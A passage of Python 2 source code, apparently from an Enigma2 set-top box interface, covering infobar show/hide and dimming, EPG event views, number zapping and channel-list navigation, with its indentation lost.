self.key_green_choice = self.ADD_TIMER
def openSimilarList(self):
id = self.event and self.event.getEventId()
refstr = str(self.currentService)
if id is not None:
self.hide()
self.secondInfoBarWasShown = False
self.session.open(EPGSelection, refstr, None, id)
class InfoBarShowHide(InfoBarScreenSaver):
""" InfoBar show/hide control, accepts toggleShow and hide actions, might start
fancy animations. """
STATE_HIDDEN = 0
STATE_HIDING = 1
STATE_SHOWING = 2
STATE_SHOWN = 3
skipToggleShow = False
def __init__(self):
self["ShowHideActions"] = ActionMap( ["InfobarShowHideActions"] ,
{
"LongOKPressed": self.toggleShowLong,
"toggleShow": self.OkPressed,
"hide": self.keyHide,
}, 1) # lower prio to make it possible to override ok and cancel..
self.__event_tracker = ServiceEventTracker(screen=self, eventmap=
{
iPlayableService.evStart: self.serviceStarted,
})
InfoBarScreenSaver.__init__(self)
self.__state = self.STATE_SHOWN
self.__locked = 0
self.DimmingTimer = eTimer()
self.DimmingTimer.callback.append(self.doDimming)
self.hideTimer = eTimer()
self.hideTimer.callback.append(self.doTimerHide)
self.hideTimer.start(5000, True)
self.onShow.append(self.__onShow)
self.onHide.append(self.__onHide)
self.hideVBILineScreen = self.session.instantiateDialog(HideVBILine)
self.hideVBILineScreen.show()
self.onShowHideNotifiers = []
self.standardInfoBar = False
self.lastSecondInfoBar = 0
self.lastResetAlpha = True
self.secondInfoBarScreen = ""
if isStandardInfoBar(self):
self.SwitchSecondInfoBarScreen()
self.onLayoutFinish.append(self.__layoutFinished)
self.onExecBegin.append(self.__onExecBegin)
def __onExecBegin(self):
self.showHideVBI()
def __layoutFinished(self):
if self.secondInfoBarScreen:
self.secondInfoBarScreen.hide()
self.standardInfoBar = True
self.secondInfoBarWasShown = False
self.EventViewIsShown = False
self.hideVBILineScreen.hide()
try:
if self.pvrStateDialog:
pass
except:
self.pvrStateDialog = None
def OkPressed(self):
if config.usage.okbutton_mode.value == "0":
self.toggleShow()
elif config.usage.okbutton_mode.value == "1":
try:
self.openServiceList()
except:
self.toggleShow()
elif config.usage.okbutton_mode.value == "2" and COOLTVGUIDE:
self.showCoolInfoGuide()
elif config.usage.okbutton_mode.value == "3" and COOLTVGUIDE:
self.showCoolSingleGuide()
elif config.usage.okbutton_mode.value == "4" and COOLTVGUIDE:
if self.isInfo:
self.showCoolTVGuide()
elif config.usage.okbutton_mode.value == "5" and COOLTVGUIDE:
self.showCoolEasyGuide()
elif config.usage.okbutton_mode.value == "6" and COOLTVGUIDE:
self.showCoolChannelGuide()
def SwitchSecondInfoBarScreen(self):
if self.lastSecondInfoBar == int(config.usage.show_second_infobar.value):
return
self.secondInfoBarScreen = self.session.instantiateDialog(SecondInfoBar)
self.lastSecondInfoBar = int(config.usage.show_second_infobar.value)
def LongOKPressed(self):
if isinstance(self, InfoBarEPG):
if config.plisettings.InfoBarEpg_mode.value == "1":
self.openInfoBarEPG()
def __onShow(self):
self.__state = self.STATE_SHOWN
for x in self.onShowHideNotifiers:
x(True)
self.startHideTimer()
VolumeControl.instance and VolumeControl.instance.showMute()
def doDimming(self):
if config.usage.show_infobar_do_dimming.value:
self.dimmed = self.dimmed-1
else:
self.dimmed = 0
self.DimmingTimer.stop()
self.doHide()
def unDimming(self):
self.unDimmingTimer.stop()
self.doWriteAlpha(config.av.osd_alpha.value)
def doWriteAlpha(self, value):
if fileExists("/proc/stb/video/alpha"):
f=open("/proc/stb/video/alpha","w")
f.write("%i" % (value))
f.close()
if value == config.av.osd_alpha.value:
self.lastResetAlpha = True
else:
self.lastResetAlpha = False
def __onHide(self):
self.__state = self.STATE_HIDDEN
self.resetAlpha()
for x in self.onShowHideNotifiers:
x(False)
def resetAlpha(self):
if config.usage.show_infobar_do_dimming.value and self.lastResetAlpha is False:
self.unDimmingTimer = eTimer()
self.unDimmingTimer.callback.append(self.unDimming)
self.unDimmingTimer.start(300, True)
def keyHide(self):
if self.__state == self.STATE_HIDDEN:
ref = self.session.nav.getCurrentlyPlayingServiceOrGroup()
if ref:
ref = ref.toString()
else:
ref = " "
if config.plisettings.InfoBarEpg_mode.value == "2" and not ref[1:].startswith(":0:0:0:0:0:0:0:0:0:"):
self.openInfoBarEPG()
else:
self.hide()
if self.secondInfoBarScreen and self.secondInfoBarScreen.shown:
self.secondInfoBarScreen.hide()
self.secondInfoBarWasShown = False
if self.session.pipshown and "popup" in config.usage.pip_hideOnExit.value:
if config.usage.pip_hideOnExit.value == "popup":
self.session.openWithCallback(self.hidePipOnExitCallback, MessageBox, _("Disable Picture in Picture"), simple=True)
else:
self.hidePipOnExitCallback(True)
else:
self.hide()
if hasattr(self, "pvrStateDialog"):
self.pvrStateDialog.hide()
def hidePipOnExitCallback(self, answer):
if answer:
self.showPiP()
def connectShowHideNotifier(self, fnc):
if not fnc in self.onShowHideNotifiers:
self.onShowHideNotifiers.append(fnc)
def disconnectShowHideNotifier(self, fnc):
if fnc in self.onShowHideNotifiers:
self.onShowHideNotifiers.remove(fnc)
def serviceStarted(self):
if self.execing:
if config.usage.show_infobar_on_zap.value:
self.doShow()
self.showHideVBI()
def startHideTimer(self):
if self.__state == self.STATE_SHOWN and not self.__locked:
self.hideTimer.stop()
idx = config.usage.infobar_timeout.index
if idx:
self.hideTimer.start(idx*1000, True)
elif (self.secondInfoBarScreen and self.secondInfoBarScreen.shown) or ((not config.usage.show_second_infobar.value or isMoviePlayerInfoBar(self)) and self.EventViewIsShown):
self.hideTimer.stop()
idx = config.usage.second_infobar_timeout.index
if idx:
self.hideTimer.start(idx*1000, True)
elif hasattr(self, "pvrStateDialog"):
self.hideTimer.stop()
#idx = config.usage.infobar_timeout.index
#if idx:
# self.hideTimer.start(idx*1000, True)
self.skipToggleShow = False
def doShow(self):
self.show()
self.hideTimer.stop()
self.DimmingTimer.stop()
self.doWriteAlpha(config.av.osd_alpha.value)
self.startHideTimer()
def doTimerHide(self):
self.hideTimer.stop()
self.DimmingTimer.start(300, True)
self.dimmed = config.usage.show_infobar_dimming_speed.value
self.skipToggleShow = False
def doHide(self):
if self.__state != self.STATE_HIDDEN:
if self.dimmed > 0:
self.doWriteAlpha((config.av.osd_alpha.value*self.dimmed/config.usage.show_infobar_dimming_speed.value))
self.DimmingTimer.start(5, True)
else:
self.DimmingTimer.stop()
self.hide()
elif self.__state == self.STATE_HIDDEN and self.secondInfoBarScreen and self.secondInfoBarScreen.shown:
if self.dimmed > 0:
self.doWriteAlpha((config.av.osd_alpha.value*self.dimmed/config.usage.show_infobar_dimming_speed.value))
self.DimmingTimer.start(5, True)
else:
self.DimmingTimer.stop()
self.secondInfoBarScreen.hide()
self.secondInfoBarWasShown = False
self.resetAlpha()
elif self.__state == self.STATE_HIDDEN and self.EventViewIsShown:
try:
self.eventView.close()
except:
pass
self.EventViewIsShown = False
# elif hasattr(self, "pvrStateDialog"):
# if self.dimmed > 0:
# self.doWriteAlpha((config.av.osd_alpha.value*self.dimmed/config.usage.show_infobar_dimming_speed.value))
# self.DimmingTimer.start(5, True)
# else:
# self.DimmingTimer.stop()
# try:
# self.pvrStateDialog.hide()
# except:
# pass
def toggleShow(self):
if self.skipToggleShow:
self.skipToggleShow = False
return
if not hasattr(self, "LongButtonPressed"):
self.LongButtonPressed = False
if not self.LongButtonPressed:
if self.__state == self.STATE_HIDDEN:
if not self.secondInfoBarWasShown or (config.usage.show_second_infobar.value == "1" and not self.EventViewIsShown):
self.show()
if self.secondInfoBarScreen:
self.secondInfoBarScreen.hide()
self.secondInfoBarWasShown = False
self.EventViewIsShown = False
elif self.secondInfoBarScreen and (config.usage.show_second_infobar.value == "2" or config.usage.show_second_infobar.value == "3") and not self.secondInfoBarScreen.shown:
self.SwitchSecondInfoBarScreen()
self.hide()
self.secondInfoBarScreen.show()
self.secondInfoBarWasShown = True
self.startHideTimer()
elif (config.usage.show_second_infobar.value == "1" or isMoviePlayerInfoBar(self)) and not self.EventViewIsShown:
self.hide()
try:
self.openEventView()
except:
pass
self.EventViewIsShown = True
self.hideTimer.stop()
elif isMoviePlayerInfoBar(self) and not self.EventViewIsShown and config.usage.show_second_infobar.value:
self.hide()
self.openEventView(True)
self.EventViewIsShown = True
self.startHideTimer()
else:
self.hide()
if self.secondInfoBarScreen and self.secondInfoBarScreen.shown:
self.secondInfoBarScreen.hide()
elif self.EventViewIsShown:
try:
self.eventView.close()
except:
pass
self.EventViewIsShown = False
def toggleShowLong(self):
try:
if self.LongButtonPressed:
if isinstance(self, InfoBarEPG):
if config.plisettings.InfoBarEpg_mode.value == "1":
self.openInfoBarEPG()
except Exception, e:
print "[InfoBarGenerics] 'toggleShowLong' failed:", e
def lockShow(self):
try:
self.__locked += 1
except:
self.__locked = 0
if self.execing:
self.show()
self.hideTimer.stop()
self.skipToggleShow = False
def unlockShow(self):
if config.usage.show_infobar_do_dimming.value and self.lastResetAlpha is False:
self.doWriteAlpha(config.av.osd_alpha.value)
try:
self.__locked -= 1
except:
self.__locked = 0
if self.__locked <0:
self.__locked = 0
if self.execing:
self.startHideTimer()
def openEventView(self, simple=False):
try:
if self.servicelist is None:
return
except:
simple = True
ref = self.session.nav.getCurrentlyPlayingServiceOrGroup()
self.getNowNext()
epglist = self.epglist
if not epglist:
self.is_now_next = False
epg = eEPGCache.getInstance()
ptr = ref and ref.valid() and epg.lookupEventTime(ref, -1)
if ptr:
epglist.append(ptr)
ptr = epg.lookupEventTime(ref, ptr.getBeginTime(), +1)
if ptr:
epglist.append(ptr)
else:
self.is_now_next = True
if epglist:
if not simple:
self.eventView = self.session.openWithCallback(self.closed, EventViewEPGSelect, epglist[0], ServiceReference(ref), self.eventViewCallback, self.openSingleServiceEPG, self.openMultiServiceEPG, self.openSimilarList)
self.dlg_stack.append(self.eventView)
else:
self.eventView = self.session.openWithCallback(self.closed, EventViewSimple, epglist[0], ServiceReference(ref))
self.dlg_stack = None
def getNowNext(self):
epglist = [ ]
service = self.session.nav.getCurrentService()
info = service and service.info()
ptr = info and info.getEvent(0)
if ptr:
epglist.append(ptr)
ptr = info and info.getEvent(1)
if ptr:
epglist.append(ptr)
self.epglist = epglist
def closed(self, ret=False):
if not self.dlg_stack:
return
closedScreen = self.dlg_stack.pop()
if self.eventView and closedScreen == self.eventView:
self.eventView = None
if ret == True or ret == 'close':
dlgs=len(self.dlg_stack)
if dlgs > 0:
self.dlg_stack[dlgs-1].close(dlgs > 1)
self.reopen(ret)
def eventViewCallback(self, setEvent, setService, val): #used for now/next displaying
epglist = self.epglist
if len(epglist) > 1:
tmp = epglist[0]
epglist[0] = epglist[1]
epglist[1] = tmp
setEvent(epglist[0])
def showCoolInfoGuide(self):
if self.servicelist is None:
return
if COOLTVGUIDE:
for plugin in plugins.getPlugins([PluginDescriptor.WHERE_EXTENSIONSMENU, PluginDescriptor.WHERE_EVENTINFO]):
if plugin.name == _("Cool Info Guide"):
self.runPlugin(plugin)
break
else:
self.session.open(MessageBox, _("The Cool TV Guide plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def showCoolSingleGuide(self):
if self.servicelist is None:
return
if COOLTVGUIDE:
for plugin in plugins.getPlugins([PluginDescriptor.WHERE_EXTENSIONSMENU, PluginDescriptor.WHERE_EVENTINFO]):
if plugin.name == _("Cool Single Guide"):
self.runPlugin(plugin)
break
else:
self.session.open(MessageBox, _("The Cool TV Guide plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def showCoolTVGuide(self):
if self.servicelist is None:
return
if COOLTVGUIDE:
for plugin in plugins.getPlugins([PluginDescriptor.WHERE_EXTENSIONSMENU, PluginDescriptor.WHERE_EVENTINFO]):
if plugin.name == _("Cool TV Guide"):
self.runPlugin(plugin)
break
else:
self.session.open(MessageBox, _("The Cool TV Guide plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def showCoolEasyGuide(self):
if self.servicelist is None:
return
if COOLTVGUIDE:
for plugin in plugins.getPlugins([PluginDescriptor.WHERE_EXTENSIONSMENU, PluginDescriptor.WHERE_EVENTINFO]):
if plugin.name == _("Cool Easy Guide"):
self.runPlugin(plugin)
break
else:
self.session.open(MessageBox, _("The Cool TV Guide plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def showCoolChannelGuide(self):
if self.servicelist is None:
return
if COOLTVGUIDE:
for plugin in plugins.getPlugins([PluginDescriptor.WHERE_EXTENSIONSMENU, PluginDescriptor.WHERE_EVENTINFO]):
if plugin.name == _("Cool Channel Guide"):
self.runPlugin(plugin)
break
else:
self.session.open(MessageBox, _("The Cool TV Guide plugin is not installed!\nPlease install it."), type = MessageBox.TYPE_INFO,timeout = 10 )
def checkHideVBI(self):
service = self.session.nav.getCurrentlyPlayingServiceReference()
servicepath = service and service.getPath()
if servicepath and servicepath.startswith("/"):
if service.toString().startswith("1:"):
info = eServiceCenter.getInstance().info(service)
service = info and info.getInfoString(service, iServiceInformation.sServiceref)
FLAG_HIDE_VBI = 512
return service and eDVBDB.getInstance().getFlag(eServiceReference(service)) & FLAG_HIDE_VBI and True
else:
return ".hidvbi." in servicepath.lower()
service = self.session.nav.getCurrentService()
info = service and service.info()
return info and info.getInfo(iServiceInformation.sHideVBI)
def showHideVBI(self):
if self.checkHideVBI():
self.hideVBILineScreen.show()
else:
self.hideVBILineScreen.hide()
class BufferIndicator(Screen):
def __init__(self, session):
Screen.__init__(self, session)
self["status"] = Label()
self.mayShow = False
self.__event_tracker = ServiceEventTracker(screen=self, eventmap=
{
iPlayableService.evBuffering: self.bufferChanged,
iPlayableService.evStart: self.__evStart,
iPlayableService.evGstreamerPlayStarted: self.__evGstreamerPlayStarted,
})
def bufferChanged(self):
if self.mayShow:
service = self.session.nav.getCurrentService()
info = service and service.info()
if info:
value = info.getInfo(iServiceInformation.sBuffer)
if value and value != 100:
self["status"].setText(_("Buffering %d%%") % value)
if not self.shown:
self.show()
def __evStart(self):
self.mayShow = True
self.hide()
def __evGstreamerPlayStarted(self):
self.mayShow = False
self.hide()
class InfoBarBuffer():
def __init__(self):
self.bufferScreen = self.session.instantiateDialog(BufferIndicator)
self.bufferScreen.hide()
class NumberZap(Screen):
def quit(self):
self.Timer.stop()
self.close()
def keyOK(self):
self.Timer.stop()
self.close(self.service, self.bouquet)
def handleServiceName(self):
if self.searchNumber:
self.service, self.bouquet = self.searchNumber(int(self["number"].getText()))
self["servicename"].setText(ServiceReference(self.service).getServiceName())
if not self.startBouquet:
self.startBouquet = self.bouquet
def keyBlue(self):
self.Timer.start(3000, True)
if self.searchNumber:
if self.startBouquet == self.bouquet:
self.service, self.bouquet = self.searchNumber(int(self["number"].getText()), firstBouquetOnly = True)
else:
self.service, self.bouquet = self.searchNumber(int(self["number"].getText()))
self["servicename"].setText(ServiceReference(self.service).getServiceName())
def keyNumberGlobal(self, number):
if config.usage.numzaptimeoutmode.value is not "off":
if config.usage.numzaptimeoutmode.value is "standard":
self.Timer.start(1000, True)
else:
self.Timer.start(config.usage.numzaptimeout2.value, True)
self.numberString += str(number)
self["number"].setText(self.numberString)
self["servicenumber"].setText(self.numberString)
self["number_summary"].setText(self.numberString)
self.field = self.numberString
self.handleServiceName()
self["service_summary"].setText(self["servicename"].getText())
if config.usage.numzappicon.value:
self.showPicon()
if len(self.numberString) >= int(config.usage.maxchannelnumlen.value):
self.keyOK()
def showPicon(self):
self["Service"].newService(self.service)
def __init__(self, session, number, searchNumberFunction = None):
Screen.__init__(self, session)
if config.usage.numzappicon.value:
self.onLayoutFinish.append(self.showPicon)
self.skinName = ["NumberZapPicon", "NumberZapWithName"]
self.onChangedEntry = [ ]
self.numberString = str(number)
self.field = str(number)
self.searchNumber = searchNumberFunction
self.startBouquet = None
self["channel"] = Label(_("Channel:"))
self["channel_summary"] = StaticText(_("Channel:"))
self["number"] = Label(self.numberString)
self["servicenumber"] = Label(self.numberString)
self["number_summary"] = StaticText(self.numberString)
self["servicename"] = Label()
self["service_summary"] = StaticText("")
self["Service"] = ServiceEvent()
self.handleServiceName()
self["service_summary"].setText(self["servicename"].getText())
self["actions"] = NumberActionMap( [ "SetupActions", "ShortcutActions" ],
{
"cancel": self.quit,
"ok": self.keyOK,
"blue": self.keyBlue,
"1": self.keyNumberGlobal,
"2": self.keyNumberGlobal,
"3": self.keyNumberGlobal,
"4": self.keyNumberGlobal,
"5": self.keyNumberGlobal,
"6": self.keyNumberGlobal,
"7": self.keyNumberGlobal,
"8": self.keyNumberGlobal,
"9": self.keyNumberGlobal,
"0": self.keyNumberGlobal
})
self.Timer = eTimer()
self.Timer.callback.append(self.keyOK)
if config.usage.numzaptimeoutmode.value is not "off":
if config.usage.numzaptimeoutmode.value is "standard":
self.Timer.start(3000, True)
else:
self.Timer.start(config.usage.numzaptimeout1.value, True)
class InfoBarNumberZap:
""" Handles an initial number for NumberZapping """
def __init__(self):
self["NumberActions"] = NumberActionMap( [ "NumberActions"],
{
"1": self.keyNumberGlobal,
"2": self.keyNumberGlobal,
"3": self.keyNumberGlobal,
"4": self.keyNumberGlobal,
"5": self.keyNumberGlobal,
"6": self.keyNumberGlobal,
"7": self.keyNumberGlobal,
"8": self.keyNumberGlobal,
"9": self.keyNumberGlobal,
"0": self.keyNumberGlobal,
})
def keyNumberGlobal(self, number):
if self.pvrStateDialog.has_key("PTSSeekPointer") and self.timeshiftEnabled() and self.isSeekable():
InfoBarTimeshiftState._mayShow(self)
self.pvrStateDialog["PTSSeekPointer"].setPosition((self.pvrStateDialog["PTSSeekBack"].instance.size().width()-4)/2, self.pvrStateDialog["PTSSeekPointer"].position[1])
if self.seekstate != self.SEEK_STATE_PLAY:
self.setSeekState(self.SEEK_STATE_PLAY)
self.ptsSeekPointerOK()
return
if self.pts_blockZap_timer.isActive():
return
# if self.save_current_timeshift and self.timeshiftEnabled():
# InfoBarTimeshift.saveTimeshiftActions(self)
# return
if number == 0:
if isinstance(self, InfoBarPiP) and self.pipHandles0Action():
self.pipDoHandle0Action()
elif len(self.servicelist.history) > 1 or config.usage.panicbutton.value:
self.checkTimeshiftRunning(self.recallPrevService)
else:
if self.has_key("TimeshiftActions") and self.timeshiftEnabled():
ts = self.getTimeshift()
if ts and ts.isTimeshiftActive():
return
self.session.openWithCallback(self.numberEntered, NumberZap, number, self.searchNumber)
def recallPrevService(self, reply):
if reply:
if config.usage.panicbutton.value:
if self.session.pipshown:
del self.session.pip
self.session.pipshown = False
self.servicelist.history_tv = []
self.servicelist.history_radio = []
self.servicelist.history = self.servicelist.history_tv
self.servicelist.history_pos = 0
self.servicelist2.history_tv = []
self.servicelist2.history_radio = []
self.servicelist2.history = self.servicelist.history_tv
self.servicelist2.history_pos = 0
if config.usage.multibouquet.value:
bqrootstr = '1:7:1:0:0:0:0:0:0:0:FROM BOUQUET "bouquets.tv" ORDER BY bouquet'
else:
self.service_types = service_types_tv
bqrootstr = '%s FROM BOUQUET "userbouquet.favourites.tv" ORDER BY bouquet'% self.service_types
serviceHandler = eServiceCenter.getInstance()
rootbouquet = eServiceReference(bqrootstr)
bouquet = eServiceReference(bqrootstr)
bouquetlist = serviceHandler.list(bouquet)
if not bouquetlist is None:
while True:
bouquet = bouquetlist.getNext()
if bouquet.flags & eServiceReference.isDirectory:
self.servicelist.clearPath()
self.servicelist.setRoot(bouquet)
servicelist = serviceHandler.list(bouquet)
if not servicelist is None:
serviceIterator = servicelist.getNext()
while serviceIterator.valid():
service, bouquet2 = self.searchNumber(config.usage.panicchannel.value)
if service == serviceIterator: break
serviceIterator = servicelist.getNext()
if serviceIterator.valid() and service == serviceIterator: break
self.servicelist.enterPath(rootbouquet)
self.servicelist.enterPath(bouquet)
self.servicelist.saveRoot()
self.servicelist2.enterPath(rootbouquet)
self.servicelist2.enterPath(bouquet)
self.servicelist2.saveRoot()
self.selectAndStartService(service, bouquet)
else:
self.servicelist.recallPrevService()
def numberEntered(self, service = None, bouquet = None):
if service:
self.selectAndStartService(service, bouquet)
def searchNumberHelper(self, serviceHandler, num, bouquet):
servicelist = serviceHandler.list(bouquet)
if servicelist:
serviceIterator = servicelist.getNext()
while serviceIterator.valid():
if num == serviceIterator.getChannelNum():
return serviceIterator
serviceIterator = servicelist.getNext()
return None
def searchNumber(self, number, firstBouquetOnly=False, bouquet=None):
bouquet = bouquet or self.servicelist.getRoot()
service = None
serviceHandler = eServiceCenter.getInstance()
if not firstBouquetOnly:
service = self.searchNumberHelper(serviceHandler, number, bouquet)
if config.usage.multibouquet.value and not service:
bouquet = self.servicelist.bouquet_root
bouquetlist = serviceHandler.list(bouquet)
if bouquetlist:
bouquet = bouquetlist.getNext()
while bouquet.valid():
if bouquet.flags & eServiceReference.isDirectory:
service = self.searchNumberHelper(serviceHandler, number, bouquet)
if service:
playable = not (service.flags & (eServiceReference.isMarker|eServiceReference.isDirectory)) or (service.flags & eServiceReference.isNumberedMarker)
if not playable:
service = None
break
if config.usage.alternative_number_mode.value or firstBouquetOnly:
break
bouquet = bouquetlist.getNext()
return service, bouquet
def selectAndStartService(self, service, bouquet):
if service:
if self.servicelist.getRoot() != bouquet: #already in correct bouquet?
self.servicelist.clearPath()
if self.servicelist.bouquet_root != bouquet:
self.servicelist.enterPath(self.servicelist.bouquet_root)
self.servicelist.enterPath(bouquet)
self.servicelist.setCurrentSelection(service) #select the service in servicelist
self.servicelist.zap(enable_pipzap = True)
self.servicelist.correctChannelNumber()
self.servicelist.startRoot = None
def zapToNumber(self, number):
service, bouquet = self.searchNumber(number)
self.selectAndStartService(service, bouquet)
config.misc.initialchannelselection = ConfigBoolean(default = True)
class InfoBarChannelSelection:
""" ChannelSelection - handles the channelSelection dialog and the initial
channelChange actions which open the channelSelection dialog """
def __init__(self):
#instantiate forever
self.servicelist = self.session.instantiateDialog(ChannelSelection)
self.servicelist2 = self.session.instantiateDialog(PiPZapSelection)
self.tscallback = None
if config.misc.initialchannelselection.value:
self.onShown.append(self.firstRun)
self["ChannelSelectActions"] = HelpableActionMap(self, "InfobarChannelSelection",
{
"switchChannelUp": (self.UpPressed, _("Open service list and select previous channel")),
"switchChannelDown": (self.DownPressed, _("Open service list and select next channel")),
"switchChannelUpLong": (self.switchChannelUp, _("Open service list and select previous channel for PiP")),
"switchChannelDownLong": (self.switchChannelDown, _("Open service list and select next channel for PiP")),
"zapUp": (self.zapUp, _("Switch to previous channel")),
"zapDown": (self.zapDown, _("Switch next channel")),
"volumeUp": (self.volumeUp, _("change Volume up")),
"volumeDown": (self.volumeDown, _("change Volume down")),
"historyBack": (self.historyBack, _("Switch to previous channel in history")),
"historyNext": (self.historyNext, _("Switch to next channel in history")),
"openServiceList": (self.openServiceList, _("Open service list")),
"openSatellites": (self.openSatellites, _("Open satellites list")),
"openBouquets": (self.openBouquets, _("Open favourites list")),
"LeftPressed": self.LeftPressed,
"RightPressed": self.RightPressed,
"ChannelPlusPressed": self.ChannelPlusPressed,
"ChannelMinusPressed": self.ChannelMinusPressed,
"ChannelPlusPressedLong": self.ChannelPlusPressed,
"ChannelMinusPressedLong": self.ChannelMinusPressed,
})
def firstRun(self):
self.onShown.remove(self.firstRun)
config.misc.initialchannelselection.value = False
config.misc.initialchannelselection.save()
self.openServiceList()
def LeftPressed(self):
if config.plisettings.InfoBarEpg_mode.value == "3":
self.openInfoBarEPG()
else:
self.zapUp()
def RightPressed(self):
if config.plisettings.InfoBarEpg_mode.value == "3":
self.openInfoBarEPG()
else:
self.zapDown()
def UpPressed(self):
if config.usage.updownbutton_mode.value == "0":
self.zapDown()
elif config.usage.updownbutton_mode.value == "1":
self.switchChannelUp()
def DownPressed(self):
if config.usage.updownbutton_mode.value == "0":
self.zapUp()
elif config.usage.updownbutton_mode.value == "1":
self.switchChannelDown()
def ChannelPlusPressed(self):
if config.usage.channelbutton_mode.value == "0":
self.zapDown()
elif config.usage.channelbutton_mode.value == "1" or config.usage.channelbutton_mode.value == "3":
self.openServiceList()
elif config.usage.channelbutton_mode.value == "2":
self.serviceListType = "Norm"
self.servicelist.showFavourites()
self.session.execDialog(self.servicelist)
def ChannelMinusPressed(self):
if config.usage.channelbutton_mode.value == "0":
self.zapUp()
elif config.usage.channelbutton_mode.value == "1" or config.usage.channelbutton_mode.value == "3":
self.openServiceList()
elif config.usage.channelbutton_mode.value == "2":
self.serviceListType = "Norm"
self.servicelist.showFavourites()
self.session.execDialog(self.servicelist)
def showTvChannelList(self, zap=False):
self.servicelist.setModeTv()
if zap:
self.servicelist.zap()
if config.usage.show_servicelist.value:
self.session.execDialog(self.servicelist)
def showRadioChannelList(self, zap=False):
self.servicelist.setModeRadio()
if zap:
self.servicelist.zap()
if config.usage.show_servicelist.value:
self.session.execDialog(self.servicelist)
def historyBack(self):
if config.usage.historymode.value == "0":
self.servicelist.historyBack()
else:
self.servicelist.historyZap(-1)
def historyNext(self):
if config.usage.historymode.value == "0":
self.servicelist.historyNext()
else:
self.servicelist.historyZap(+1)
def switchChannelUp(self):
if not self.secondInfoBarScreen or not self.secondInfoBarScreen.shown:
self.keyHide()
if not self.LongButtonPressed or SystemInfo.get("NumVideoDecoders", 1) <= 1:
if not config.usage.show_bouquetalways.value:
if "keep" not in config.usage.servicelist_cursor_behavior.value:
self.servicelist.moveUp()
self.session.execDialog(self.servicelist)
else:
self.servicelist.showFavourites()
self.session.execDialog(self.servicelist)
elif self.LongButtonPressed:
if not config.usage.show_bouquetalways.value:
if "keep" not in config.usage.servicelist_cursor_behavior.value:
self.servicelist2.moveUp()
self.session.execDialog(self.servicelist2)
else:
self.servicelist2.showFavourites()
self.session.execDialog(self.servicelist2)
def switchChannelDown(self):
if not self.secondInfoBarScreen or not self.secondInfoBarScreen.shown:
self.keyHide()
if not self.LongButtonPressed or SystemInfo.get("NumVideoDecoders", 1) <= 1:
if not config.usage.show_bouquetalways.value:
if "keep" not in config.usage.servicelist_cursor_behavior.value:
self.servicelist.moveDown()
self.session.execDialog(self.servicelist)
else:
self.servicelist.showFavourites()
self.session.execDialog(self.servicelist)
elif self.LongButtonPressed:
if not config.usage.show_bouquetalways.value:
if "keep" not in config.usage.servicelist_cursor_behavior.value:
self.servicelist2.moveDown()
self.session.execDialog(self.servicelist2)
else:
self.servicelist2.showFavourites()
self.session.execDialog(self.servicelist2)
def openServiceList(self):
self.session.execDialog(self.servicelist)
def openServiceListPiP(self):
self.session.execDialog(self.servicelist2)
def openSatellites(self):
self.servicelist.showSatellites()
self.session.execDialog(self.servicelist)
def openBouquets(self):
self.servicelist.showFavourites()
self.session.execDialog(self.servicelist)
def zapUp(self):
if not self.LongButtonPressed or SystemInfo.get("NumVideoDecoders", 1) <= 1:
if self.pts_blockZap_timer.isActive():
return
self["SeekActionsPTS"].setEnabled(False)
if self.servicelist.inBouquet():
prev = self.servicelist.getCurrentSelection()
if prev:
prev = prev.toString()
while True:
if config.usage.quickzap_bouquet_change.value and self.servicelist.atBegin():
self.servicelist.prevBouquet()
self.servicelist.moveEnd()
else:
self.servicelist.moveUp()
cur = self.servicelist.getCurrentSelection()
if cur:
if self.servicelist.dopipzap:
isPlayable = self.session.pip.isPlayableForPipService(cur)
else:
isPlayable = isPlayableForCur(cur)
if cur and (cur.toString() == prev or isPlayable):
break
else:
self.servicelist.moveUp()
self.servicelist.zap(enable_pipzap = True)
elif self.LongButtonPressed:
if not hasattr(self.session, 'pip') and not self.session.pipshown:
self.session.open(MessageBox, _("Please open Picture in Picture first"), MessageBox.TYPE_ERROR)
return
from Screens.ChannelSelection import ChannelSelection
ChannelSelectionInstance = ChannelSelection.instance
ChannelSelectionInstance.dopipzap = True
if self.servicelist2.inBouquet():
prev = self.servicelist2.getCurrentSelection()
if prev:
prev = prev.toString()
while True:
if config.usage.quickzap_bouquet_change.value and self.servicelist2.atBegin():
self.servicelist2.prevBouquet()
self.servicelist2.moveEnd()
else:
self.servicelist2.moveUp()
cur = self.servicelist2.getCurrentSelection()
if cur:
if ChannelSelectionInstance.dopipzap:
isPlayable = self.session.pip.isPlayableForPipService(cur)
else:
isPlayable = isPlayableForCur(cur)
if cur and (cur.toString() == prev or isPlayable):
break
else:
self.servicelist2.moveUp()
self.servicelist2.zap(enable_pipzap = True)
ChannelSelectionInstance.dopipzap = False
if self.timeshiftEnabled() and self.isSeekable():
self["SeekActionsPTS"].setEnabled(True)
def zapDown(self):
if not self.LongButtonPressed or SystemInfo.get("NumVideoDecoders", 1) <= 1:
if self.pts_blockZap_timer.isActive():
return
self["SeekActionsPTS"].setEnabled(False)
if self.servicelist.inBouquet():
prev = self.servicelist.getCurrentSelection()
if prev:
prev = prev.toString()
while True:
if config.usage.quickzap_bouquet_change.value and self.servicelist.atEnd():
self.servicelist.nextBouquet()
self.servicelist.moveTop()
else:
self.servicelist.moveDown()
cur = self.servicelist.getCurrentSelection()
if cur:
if self.servicelist.dopipzap:
isPlayable = self.session.pip.isPlayableForPipService(cur)
else:
isPlayable = isPlayableForCur(cur)
if cur and (cur.toString() == prev or isPlayable):
break
else:
self.servicelist.moveDown()
self.servicelist.zap(enable_pipzap = True)
elif self.LongButtonPressed:
if not hasattr(self.session, 'pip') and not self.session.pipshown:
self.session.open(MessageBox, _("Please open Picture in Picture first"), MessageBox.TYPE_ERROR)
return
from Screens.ChannelSelection import ChannelSelection
ChannelSelectionInstance = ChannelSelection.instance
ChannelSelectionInstance.dopipzap = True
if self.servicelist2.inBouquet():
prev = self.servicelist2.getCurrentSelection()
if prev:
prev = prev.toString()
while True:
if config.usage.quickzap_bouquet_change.value and self.servicelist2.atEnd():
self.servicelist2.nextBouquet()
self.servicelist2.moveTop()
else:
self.servicelist2.moveDown()
cur = self.servicelist2.getCurrentSelection()
if cur:
if ChannelSelectionInstance.dopipzap:
isPlayable = self.session.pip.isPlayableForPipService(cur)
else:
isPlayable = isPlayableForCur(cur)
